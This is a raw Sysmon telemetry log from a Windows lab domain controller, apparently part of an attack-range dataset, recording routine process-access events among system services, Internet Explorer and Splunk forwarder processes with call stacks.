10341000x800000000000000013279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:42.554{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:42.554{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:42.554{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:43.179{59A5CD1D-8E46-6005-1600-00000000A301}15442288C:\Windows\system32\svchost.exe{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:43.179{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:44.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:44.695{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9414-6005-0F05-00000000A301}6708C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:44.695{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:44.695{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:44.695{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:44.695{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:44.695{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9414-6005-0F05-00000000A301}6708C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:44.695{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9414-6005-0F05-00000000A301}6708C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:44.555{59A5CD1D-9414-6005-0F05-00000000A301}6708C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:44.539{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:44.382{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:44.382{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:45.663{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\system32\explorerframe.dll+154e|C:\Windows\SYSTEM32\IEFRAME.dll+6dbf2|C:\Windows\SYSTEM32\IEFRAME.dll+d018a|C:\Windows\SYSTEM32\IEFRAME.dll+d1649|C:\Windows\SYSTEM32\IEFRAME.dll+d1e22|C:\Windows\SYSTEM32\IEFRAME.dll+ceef8|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\SYSTEM32\iertutil.dll+32b2d|C:\Windows\SYSTEM32\IEFRAME.dll+d970b|C:\Windows\SYSTEM32\IEFRAME.dll+1196f|C:\Windows\SYSTEM32\IEFRAME.dll+129b8|C:\Windows\SYSTEM32\IEFRAME.dll+12c00|C:\Windows\SYSTEM32\IEFRAME.dll+13101|C:\Windows\SYSTEM32\IEFRAME.dll+2a8506|C:\Windows\SYSTEM32\IEFRAME.dll+152534|C:\Windows\SYSTEM32\IEFRAME.dll+14ab1 10341000x800000000000000013308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:45.663{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\system32\explorerframe.dll+1501|C:\Windows\SYSTEM32\IEFRAME.dll+6dbf2|C:\Windows\SYSTEM32\IEFRAME.dll+d018a|C:\Windows\SYSTEM32\IEFRAME.dll+d1649|C:\Windows\SYSTEM32\IEFRAME.dll+d1e22|C:\Windows\SYSTEM32\IEFRAME.dll+ceef8|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\SYSTEM32\iertutil.dll+32b2d|C:\Windows\SYSTEM32\IEFRAME.dll+d970b|C:\Windows\SYSTEM32\IEFRAME.dll+1196f|C:\Windows\SYSTEM32\IEFRAME.dll+129b8|C:\Windows\SYSTEM32\IEFRAME.dll+12c00|C:\Windows\SYSTEM32\IEFRAME.dll+13101|C:\Windows\SYSTEM32\IEFRAME.dll+2a8506|C:\Windows\SYSTEM32\IEFRAME.dll+152534 10341000x800000000000000013307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:45.663{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\system32\explorerframe.dll+1501|C:\Windows\SYSTEM32\IEFRAME.dll+6dbf2|C:\Windows\SYSTEM32\IEFRAME.dll+d018a|C:\Windows\SYSTEM32\IEFRAME.dll+d1649|C:\Windows\SYSTEM32\IEFRAME.dll+d1e22|C:\Windows\SYSTEM32\IEFRAME.dll+ceef8|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\SYSTEM32\iertutil.dll+32b2d|C:\Windows\SYSTEM32\IEFRAME.dll+d970b|C:\Windows\SYSTEM32\IEFRAME.dll+1196f|C:\Windows\SYSTEM32\IEFRAME.dll+129b8|C:\Windows\SYSTEM32\IEFRAME.dll+12c00|C:\Windows\SYSTEM32\IEFRAME.dll+13101|C:\Windows\SYSTEM32\IEFRAME.dll+2a8506|C:\Windows\SYSTEM32\IEFRAME.dll+152534|C:\Windows\SYSTEM32\IEFRAME.dll+14ab1 10341000x800000000000000013306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:45.663{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9415-6005-1005-00000000A301}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:45.663{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:45.663{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:45.663{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:45.663{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 